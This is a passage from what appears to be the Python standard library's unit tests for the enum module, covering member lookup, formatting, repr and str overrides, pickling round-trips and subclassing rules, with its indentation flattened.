except Exception as exc:
Question = exc
try:
Answer = Enum('Answer', 'him this then there because')
except Exception as exc:
Answer = exc
try:
Theory = Enum('Theory', 'rule law supposition', qualname='spanish_inquisition')
except Exception as exc:
Theory = exc
# for doctests
try:
class Fruit(Enum):
TOMATO = 1
BANANA = 2
CHERRY = 3
except Exception:
pass
def test_pickle_dump_load(assertion, source, target=None):
if target is None:
target = source
for protocol in range(HIGHEST_PROTOCOL + 1):
assertion(loads(dumps(source, protocol=protocol)), target)
def test_pickle_exception(assertion, exception, obj):
for protocol in range(HIGHEST_PROTOCOL + 1):
with assertion(exception):
dumps(obj, protocol=protocol)
class TestHelpers(unittest.TestCase):
# _is_descriptor, _is_sunder, _is_dunder
def test_is_descriptor(self):
class foo:
pass
for attr in ('__get__','__set__','__delete__'):
obj = foo()
self.assertFalse(enum._is_descriptor(obj))
setattr(obj, attr, 1)
self.assertTrue(enum._is_descriptor(obj))
def test_is_sunder(self):
for s in ('_a_', '_aa_'):
self.assertTrue(enum._is_sunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '__a__', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_sunder(s))
def test_is_dunder(self):
for s in ('__a__', '__aa__'):
self.assertTrue(enum._is_dunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '_a_', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_dunder(s))
# for subclassing tests
class classproperty:
def __init__(self, fget=None, fset=None, fdel=None, doc=None):
self.fget = fget
self.fset = fset
self.fdel = fdel
if doc is None and fget is not None:
doc = fget.__doc__
self.__doc__ = doc
def __get__(self, instance, ownerclass):
return self.fget(ownerclass)
# tests
class TestEnum(unittest.TestCase):
def setUp(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
self.Season = Season
class Konstants(float, Enum):
E = 2.7182818
PI = 3.1415926
TAU = 2 * PI
self.Konstants = Konstants
class Grades(IntEnum):
A = 5
B = 4
C = 3
D = 2
F = 0
self.Grades = Grades
class Directional(str, Enum):
EAST = 'east'
WEST = 'west'
NORTH = 'north'
SOUTH = 'south'
self.Directional = Directional
from datetime import date
class Holiday(date, Enum):
NEW_YEAR = 2013, 1, 1
IDES_OF_MARCH = 2013, 3, 15
self.Holiday = Holiday
def test_dir_on_class(self):
Season = self.Season
self.assertEqual(
set(dir(Season)),
set(['__class__', '__doc__', '__members__', '__module__',
'SPRING', 'SUMMER', 'AUTUMN', 'WINTER']),
)
def test_dir_on_item(self):
Season = self.Season
self.assertEqual(
set(dir(Season.WINTER)),
set(['__class__', '__doc__', '__module__', 'name', 'value']),
)
def test_dir_with_added_behavior(self):
class Test(Enum):
this = 'that'
these = 'those'
def wowser(self):
return ("Wowser! I'm %s!" % self.name)
self.assertEqual(
set(dir(Test)),
set(['__class__', '__doc__', '__members__', '__module__', 'this', 'these']),
)
self.assertEqual(
set(dir(Test.this)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'wowser']),
)
def test_dir_on_sub_with_behavior_on_super(self):
# see issue22506
class SuperEnum(Enum):
def invisible(self):
return "did you see me?"
class SubEnum(SuperEnum):
sample = 5
self.assertEqual(
set(dir(SubEnum.sample)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'invisible']),
)
def test_dir_on_sub_with_behavior_including_instance_dict_on_super(self):
# see issue40084
class SuperEnum(IntEnum):
def __new__(cls, value, description=""):
obj = int.__new__(cls, value)
obj._value_ = value
obj.description = description
return obj
class SubEnum(SuperEnum):
sample = 5
self.assertTrue({'description'} <= set(dir(SubEnum.sample)))
def test_enum_in_enum_out(self):
Season = self.Season
self.assertIs(Season(Season.WINTER), Season.WINTER)
def test_enum_value(self):
Season = self.Season
self.assertEqual(Season.SPRING.value, 1)
def test_intenum_value(self):
self.assertEqual(IntStooges.CURLY.value, 2)
def test_enum(self):
Season = self.Season
lst = list(Season)
self.assertEqual(len(lst), len(Season))
self.assertEqual(len(Season), 4, Season)
self.assertEqual(
[Season.SPRING, Season.SUMMER, Season.AUTUMN, Season.WINTER], lst)
for i, season in enumerate('SPRING SUMMER AUTUMN WINTER'.split(), 1):
e = Season(i)
self.assertEqual(e, getattr(Season, season))
self.assertEqual(e.value, i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, season)
self.assertIn(e, Season)
self.assertIs(type(e), Season)
self.assertIsInstance(e, Season)
self.assertEqual(str(e), 'Season.' + season)
self.assertEqual(
repr(e),
'<Season.{0}: {1}>'.format(season, i),
)
def test_value_name(self):
Season = self.Season
self.assertEqual(Season.SPRING.name, 'SPRING')
self.assertEqual(Season.SPRING.value, 1)
with self.assertRaises(AttributeError):
Season.SPRING.name = 'invierno'
with self.assertRaises(AttributeError):
Season.SPRING.value = 2
def test_changing_member(self):
Season = self.Season
with self.assertRaises(AttributeError):
Season.WINTER = 'really cold'
def test_attribute_deletion(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
def spam(cls):
pass
self.assertTrue(hasattr(Season, 'spam'))
del Season.spam
self.assertFalse(hasattr(Season, 'spam'))
with self.assertRaises(AttributeError):
del Season.SPRING
with self.assertRaises(AttributeError):
del Season.DRY
with self.assertRaises(AttributeError):
del Season.SPRING.name
def test_bool_of_class(self):
class Empty(Enum):
pass
self.assertTrue(bool(Empty))
def test_bool_of_member(self):
class Count(Enum):
zero = 0
one = 1
two = 2
for member in Count:
self.assertTrue(bool(member))
def test_invalid_names(self):
with self.assertRaises(ValueError):
class Wrong(Enum):
mro = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_create_= 11
with self.assertRaises(ValueError):
class Wrong(Enum):
_get_mixins_ = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_find_new_ = 1
with self.assertRaises(ValueError):
class Wrong(Enum):
_any_name_ = 9
def test_bool(self):
# plain Enum members are always True
class Logic(Enum):
true = True
false = False
self.assertTrue(Logic.true)
self.assertTrue(Logic.false)
# unless overridden
class RealLogic(Enum):
true = True
false = False
def __bool__(self):
return bool(self._value_)
self.assertTrue(RealLogic.true)
self.assertFalse(RealLogic.false)
# mixed Enums depend on mixed-in type
class IntLogic(int, Enum):
true = 1
false = 0
self.assertTrue(IntLogic.true)
self.assertFalse(IntLogic.false)
def test_contains(self):
Season = self.Season
self.assertIn(Season.AUTUMN, Season)
with self.assertRaises(TypeError):
3 in Season
with self.assertRaises(TypeError):
'AUTUMN' in Season
val = Season(3)
self.assertIn(val, Season)
class OtherEnum(Enum):
one = 1; two = 2
self.assertNotIn(OtherEnum.two, Season)
def test_comparisons(self):
Season = self.Season
with self.assertRaises(TypeError):
Season.SPRING < Season.WINTER
with self.assertRaises(TypeError):
Season.SPRING > 4
self.assertNotEqual(Season.SPRING, 1)
class Part(Enum):
SPRING = 1
CLIP = 2
BARREL = 3
self.assertNotEqual(Season.SPRING, Part.SPRING)
with self.assertRaises(TypeError):
Season.SPRING < Part.CLIP
def test_enum_duplicates(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = FALL = 3
WINTER = 4
ANOTHER_SPRING = 1
lst = list(Season)
self.assertEqual(
lst,
[Season.SPRING, Season.SUMMER,
Season.AUTUMN, Season.WINTER,
])
self.assertIs(Season.FALL, Season.AUTUMN)
self.assertEqual(Season.FALL.value, 3)
self.assertEqual(Season.AUTUMN.value, 3)
self.assertIs(Season(3), Season.AUTUMN)
self.assertIs(Season(1), Season.SPRING)
self.assertEqual(Season.FALL.name, 'AUTUMN')
self.assertEqual(
[k for k,v in Season.__members__.items() if v.name != k],
['FALL', 'ANOTHER_SPRING'],
)
def test_duplicate_name(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
red = 4
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
def red(self):
return 'red'
with self.assertRaises(TypeError):
class Color(Enum):
@property
def red(self):
return 'redder'
red = 1
green = 2
blue = 3
def test_reserved__sunder_(self):
with self.assertRaisesRegex(
ValueError,
'_sunder_ names, such as "_bad_", are reserved',
):
class Bad(Enum):
_bad_ = 1
def test_enum_with_value_name(self):
class Huh(Enum):
name = 1
value = 2
self.assertEqual(
list(Huh),
[Huh.name, Huh.value],
)
self.assertIs(type(Huh.name), Huh)
self.assertEqual(Huh.name.name, 'name')
self.assertEqual(Huh.name.value, 1)
def test_format_enum(self):
Season = self.Season
self.assertEqual('{}'.format(Season.SPRING),
'{}'.format(str(Season.SPRING)))
self.assertEqual( '{:}'.format(Season.SPRING),
'{:}'.format(str(Season.SPRING)))
self.assertEqual('{:20}'.format(Season.SPRING),
'{:20}'.format(str(Season.SPRING)))
self.assertEqual('{:^20}'.format(Season.SPRING),
'{:^20}'.format(str(Season.SPRING)))
self.assertEqual('{:>20}'.format(Season.SPRING),
'{:>20}'.format(str(Season.SPRING)))
self.assertEqual('{:<20}'.format(Season.SPRING),
'{:<20}'.format(str(Season.SPRING)))
def test_str_override_enum(self):
class EnumWithStrOverrides(Enum):
one = auto()
two = auto()
def __str__(self):
return 'Str!'
self.assertEqual(str(EnumWithStrOverrides.one), 'Str!')
self.assertEqual('{}'.format(EnumWithStrOverrides.one), 'Str!')
def test_format_override_enum(self):
class EnumWithFormatOverride(Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'Format!!'
self.assertEqual(str(EnumWithFormatOverride.one), 'EnumWithFormatOverride.one')
self.assertEqual('{}'.format(EnumWithFormatOverride.one), 'Format!!')
def test_str_and_format_override_enum(self):
class EnumWithStrFormatOverrides(Enum):
one = auto()
two = auto()
def __str__(self):
return 'Str!'
def __format__(self, spec):
return 'Format!'
self.assertEqual(str(EnumWithStrFormatOverrides.one), 'Str!')
self.assertEqual('{}'.format(EnumWithStrFormatOverrides.one), 'Format!')
def test_str_override_mixin(self):
class MixinEnumWithStrOverride(float, Enum):
one = 1.0
two = 2.0
def __str__(self):
return 'Overridden!'
self.assertEqual(str(MixinEnumWithStrOverride.one), 'Overridden!')
self.assertEqual('{}'.format(MixinEnumWithStrOverride.one), 'Overridden!')
def test_str_and_format_override_mixin(self):
class MixinWithStrFormatOverrides(float, Enum):
one = 1.0
two = 2.0
def __str__(self):
return 'Str!'
def __format__(self, spec):
return 'Format!'
self.assertEqual(str(MixinWithStrFormatOverrides.one), 'Str!')
self.assertEqual('{}'.format(MixinWithStrFormatOverrides.one), 'Format!')
def test_format_override_mixin(self):
class TestFloat(float, Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'TestFloat success!'
self.assertEqual(str(TestFloat.one), 'TestFloat.one')
self.assertEqual('{}'.format(TestFloat.one), 'TestFloat success!')
def assertFormatIsValue(self, spec, member):
self.assertEqual(spec.format(member), spec.format(member.value))
def test_format_enum_date(self):
Holiday = self.Holiday
self.assertFormatIsValue('{}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:^20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:>20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:<20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m %M:00}', Holiday.IDES_OF_MARCH)
def test_format_enum_float(self):
Konstants = self.Konstants
self.assertFormatIsValue('{}', Konstants.TAU)
self.assertFormatIsValue('{:}', Konstants.TAU)
self.assertFormatIsValue('{:20}', Konstants.TAU)
self.assertFormatIsValue('{:^20}', Konstants.TAU)
self.assertFormatIsValue('{:>20}', Konstants.TAU)
self.assertFormatIsValue('{:<20}', Konstants.TAU)
self.assertFormatIsValue('{:n}', Konstants.TAU)
self.assertFormatIsValue('{:5.2}', Konstants.TAU)
self.assertFormatIsValue('{:f}', Konstants.TAU)
def test_format_enum_int(self):
Grades = self.Grades
self.assertFormatIsValue('{}', Grades.C)
self.assertFormatIsValue('{:}', Grades.C)
self.assertFormatIsValue('{:20}', Grades.C)
self.assertFormatIsValue('{:^20}', Grades.C)
self.assertFormatIsValue('{:>20}', Grades.C)
self.assertFormatIsValue('{:<20}', Grades.C)
self.assertFormatIsValue('{:+}', Grades.C)
self.assertFormatIsValue('{:08X}', Grades.C)
self.assertFormatIsValue('{:b}', Grades.C)
def test_format_enum_str(self):
Directional = self.Directional
self.assertFormatIsValue('{}', Directional.WEST)
self.assertFormatIsValue('{:}', Directional.WEST)
self.assertFormatIsValue('{:20}', Directional.WEST)
self.assertFormatIsValue('{:^20}', Directional.WEST)
self.assertFormatIsValue('{:>20}', Directional.WEST)
self.assertFormatIsValue('{:<20}', Directional.WEST)
def test_object_str_override(self):
class Colors(Enum):
RED, GREEN, BLUE = 1, 2, 3
def __repr__(self):
return "test.%s" % (self._name_, )
__str__ = object.__str__
self.assertEqual(str(Colors.RED), 'test.RED')
def test_enum_str_override(self):
class MyStrEnum(Enum):
def __str__(self):
return 'MyStr'
class MyMethodEnum(Enum):
def hello(self):
return 'Hello! My name is %s' % self.name
class Test1Enum(MyMethodEnum, int, MyStrEnum):
One = 1
Two = 2
self.assertEqual(str(Test1Enum.One), 'MyStr')
#
class Test2Enum(MyStrEnum, MyMethodEnum):
One = 1
Two = 2
self.assertEqual(str(Test2Enum.One), 'MyStr')
def test_inherited_data_type(self):
class HexInt(int):
def __repr__(self):
return hex(self)
class MyEnum(HexInt, enum.Enum):
A = 1
B = 2
C = 3
self.assertEqual(repr(MyEnum.A), '<MyEnum.A: 0x1>')
def test_too_many_data_types(self):
with self.assertRaisesRegex(TypeError, 'too many data types'):
class Huh(str, int, Enum):
One = 1
class MyStr(str):
def hello(self):
return 'hello, %s' % self
class MyInt(int):
def repr(self):
return hex(self)
with self.assertRaisesRegex(TypeError, 'too many data types'):
class Huh(MyStr, MyInt, Enum):
One = 1
def test_hash(self):
Season = self.Season
dates = {}
dates[Season.WINTER] = '1225'
dates[Season.SPRING] = '0315'
dates[Season.SUMMER] = '0704'
dates[Season.AUTUMN] = '1031'
self.assertEqual(dates[Season.AUTUMN], '1031')
def test_intenum_from_scratch(self):
class phy(int, Enum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_intenum_inherited(self):
class IntEnum(int, Enum):
pass
class phy(IntEnum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_from_scratch(self):
class phy(float, Enum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_inherited(self):
class FloatEnum(float, Enum):
pass
class phy(FloatEnum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_strenum_from_scratch(self):
class phy(str, Enum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
def test_strenum_inherited_methods(self):
class phy(StrEnum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
self.assertEqual(phy.pi.upper(), 'PI')
self.assertEqual(phy.tau.count('a'), 1)
def test_intenum(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertEqual(['a', 'b', 'c'][WeekDay.MONDAY], 'c')
self.assertEqual([i for i in range(WeekDay.TUESDAY)], [0, 1, 2])
lst = list(WeekDay)
self.assertEqual(len(lst), len(WeekDay))
self.assertEqual(len(WeekDay), 7)
target = 'SUNDAY MONDAY TUESDAY WEDNESDAY THURSDAY FRIDAY SATURDAY'
target = target.split()
for i, weekday in enumerate(target, 1):
e = WeekDay(i)
self.assertEqual(e, i)
self.assertEqual(int(e), i)
self.assertEqual(e.name, weekday)
self.assertIn(e, WeekDay)
self.assertEqual(lst.index(e)+1, i)
self.assertTrue(0 < e < 8)
self.assertIs(type(e), WeekDay)
self.assertIsInstance(e, int)
self.assertIsInstance(e, Enum)
def test_intenum_duplicates(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = TEUSDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertIs(WeekDay.TEUSDAY, WeekDay.TUESDAY)
self.assertEqual(WeekDay(3).name, 'TUESDAY')
self.assertEqual([k for k,v in WeekDay.__members__.items()
if v.name != k], ['TEUSDAY', ])
def test_intenum_from_bytes(self):
self.assertIs(IntStooges.from_bytes(b'\x00\x03', 'big'), IntStooges.MOE)
with self.assertRaises(ValueError):
IntStooges.from_bytes(b'\x00\x05', 'big')
def test_floatenum_fromhex(self):
h = float.hex(FloatStooges.MOE.value)
self.assertIs(FloatStooges.fromhex(h), FloatStooges.MOE)
h = float.hex(FloatStooges.MOE.value + 0.01)
with self.assertRaises(ValueError):
FloatStooges.fromhex(h)
def test_pickle_enum(self):
if isinstance(Stooges, Exception):
raise Stooges
test_pickle_dump_load(self.assertIs, Stooges.CURLY)
test_pickle_dump_load(self.assertIs, Stooges)
def test_pickle_int(self):
if isinstance(IntStooges, Exception):
raise IntStooges
test_pickle_dump_load(self.assertIs, IntStooges.CURLY)
test_pickle_dump_load(self.assertIs, IntStooges)
def test_pickle_float(self):
if isinstance(FloatStooges, Exception):
raise FloatStooges
test_pickle_dump_load(self.assertIs, FloatStooges.CURLY)
test_pickle_dump_load(self.assertIs, FloatStooges)
def test_pickle_enum_function(self):
if isinstance(Answer, Exception):
raise Answer
test_pickle_dump_load(self.assertIs, Answer.him)
test_pickle_dump_load(self.assertIs, Answer)
def test_pickle_enum_function_with_module(self):
if isinstance(Question, Exception):
raise Question
test_pickle_dump_load(self.assertIs, Question.who)
test_pickle_dump_load(self.assertIs, Question)
def test_enum_function_with_qualname(self):
if isinstance(Theory, Exception):
raise Theory
self.assertEqual(Theory.__qualname__, 'spanish_inquisition')
def test_class_nested_enum_and_pickle_protocol_four(self):
# would normally just have this directly in the class namespace
class NestedEnum(Enum):
twigs = 'common'
shiny = 'rare'
self.__class__.NestedEnum = NestedEnum
self.NestedEnum.__qualname__ = '%s.NestedEnum' % self.__class__.__name__
test_pickle_dump_load(self.assertIs, self.NestedEnum.twigs)
def test_pickle_by_name(self):
class ReplaceGlobalInt(IntEnum):
ONE = 1
TWO = 2
ReplaceGlobalInt.__reduce_ex__ = enum._reduce_ex_by_name
for proto in range(HIGHEST_PROTOCOL):
self.assertEqual(ReplaceGlobalInt.TWO.__reduce_ex__(proto), 'TWO')
def test_exploding_pickle(self):
BadPickle = Enum(
'BadPickle', 'dill sweet bread-n-butter', module=__name__)
globals()['BadPickle'] = BadPickle
# now break BadPickle to test exception raising
enum._make_class_unpicklable(BadPickle)
test_pickle_exception(self.assertRaises, TypeError, BadPickle.dill)
test_pickle_exception(self.assertRaises, PicklingError, BadPickle)
def test_string_enum(self):
class SkillLevel(str, Enum):
master = 'what is the sound of one hand clapping?'
journeyman = 'why did the chicken cross the road?'
apprentice = 'knock, knock!'
self.assertEqual(SkillLevel.apprentice, 'knock, knock!')
def test_getattr_getitem(self):
class Period(Enum):
morning = 1
noon = 2
evening = 3
night = 4
self.assertIs(Period(2), Period.noon)
self.assertIs(getattr(Period, 'night'), Period.night)
self.assertIs(Period['morning'], Period.morning)
def test_getattr_dunder(self):
Season = self.Season
self.assertTrue(getattr(Season, '__eq__'))
def test_iteration_order(self):
class Season(Enum):
SUMMER = 2
WINTER = 4
AUTUMN = 3
SPRING = 1
self.assertEqual(
list(Season),
[Season.SUMMER, Season.WINTER, Season.AUTUMN, Season.SPRING],
)
def test_reversed_iteration_order(self):
self.assertEqual(
list(reversed(self.Season)),
[self.Season.WINTER, self.Season.AUTUMN, self.Season.SUMMER,
self.Season.SPRING]
)
def test_programmatic_function_string(self):
SummerMonth = Enum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', start=10)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 10):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'])
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list_with_start(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'], start=20)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 20):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_iterable(self):
SummerMonth = Enum(
'SummerMonth',
(('june', 1), ('july', 2), ('august', 3))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_from_dict(self):
SummerMonth = Enum(
'SummerMonth',
OrderedDict((('june', 1), ('july', 2), ('august', 3)))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int, start=30)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 30):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass(self):
SummerMonth = IntEnum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass_with_start(self):
SummerMonth = IntEnum('SummerMonth', 'june july august', start=40)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 40):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_subclassing(self):
if isinstance(Name, Exception):
raise Name
self.assertEqual(Name.BDFL, 'Guido van Rossum')
self.assertTrue(Name.BDFL, Name('Guido van Rossum'))
self.assertIs(Name.BDFL, getattr(Name, 'BDFL'))
test_pickle_dump_load(self.assertIs, Name.BDFL)
def test_extending(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
with self.assertRaisesRegex(TypeError, "EvenMoreColor: cannot extend enumeration 'Color'"):
class EvenMoreColor(Color, IntEnum):
chartruese = 7
def test_exclude_methods(self):
class whatever(Enum):
this = 'that'
these = 'those'
def really(self):
return 'no, not %s' % self.value
self.assertIsNot(type(whatever.really), whatever)
self.assertEqual(whatever.this.really(), 'no, not that')
def test_wrong_inheritance_order(self):
with self.assertRaises(TypeError):
class Wrong(Enum, str):
NotHere = 'error before this point'
def test_intenum_transitivity(self):
class number(IntEnum):
one = 1
two = 2
three = 3
class numero(IntEnum):
uno = 1
dos = 2
tres = 3
self.assertEqual(number.one, numero.uno)
self.assertEqual(number.two, numero.dos)
self.assertEqual(number.three, numero.tres)
def test_wrong_enum_in_call(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_wrong_enum_in_mixed_call(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_mixed_enum_in_call_1(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.female), Monochrome.white)
def test_mixed_enum_in_call_2(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.male), Monochrome.black)
def test_flufl_enum(self):
class Fluflnum(Enum):
def __int__(self):
return int(self.value)
class MailManOptions(Fluflnum):
option1 = 1
option2 = 2
option3 = 3
self.assertEqual(int(MailManOptions.option1), 1)
def test_introspection(self):
class Number(IntEnum):
one = 100
two = 200
self.assertIs(Number.one._member_type_, int)
self.assertIs(Number._member_type_, int)
class String(str, Enum):
yarn = 'soft'
rope = 'rough'
wire = 'hard'
self.assertIs(String.yarn._member_type_, str)
self.assertIs(String._member_type_, str)
class Plain(Enum):
vanilla = 'white'
one = 1
self.assertIs(Plain.vanilla._member_type_, object)
self.assertIs(Plain._member_type_, object)
def test_no_such_enum_member(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
Color(4)
with self.assertRaises(KeyError):
Color['chartreuse']
def test_new_repr(self):
class Color(Enum):
red = 1
green = 2
blue = 3
def __repr__(self):
return "don't you just love shades of %s?" % self.name
self.assertEqual(
repr(Color.blue),
"don't you just love shades of blue?",
)
def test_inherited_repr(self):
class MyEnum(Enum):
def __repr__(self):
return "My name is %s." % self.name
class MyIntEnum(int, MyEnum):
this = 1
that = 2
theother = 3
self.assertEqual(repr(MyIntEnum.that), "My name is that.")
def test_multiple_mixin_mro(self):
class auto_enum(type(Enum)):
def __new__(metacls, cls, bases, classdict):
temp = type(classdict)()
names = set(classdict._member_names)
i = 0
for k in classdict._member_names:
v = classdict[k]
if v is Ellipsis:
v = i
else:
i = v
i += 1
temp[k] = v
for k, v in classdict.items():
if k not in names:
temp[k] = v
return super(auto_enum, metacls).__new__(
metacls, cls, bases, temp)
class AutoNumberedEnum(Enum, metaclass=auto_enum):
pass
class AutoIntEnum(IntEnum, metaclass=auto_enum):
pass
class TestAutoNumber(AutoNumberedEnum):
a = ...
b = 3
c = ...
class TestAutoInt(AutoIntEnum):
a = ...
b = 3
c = ...
def test_subclasses_with_getnewargs(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs__(self):
return self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
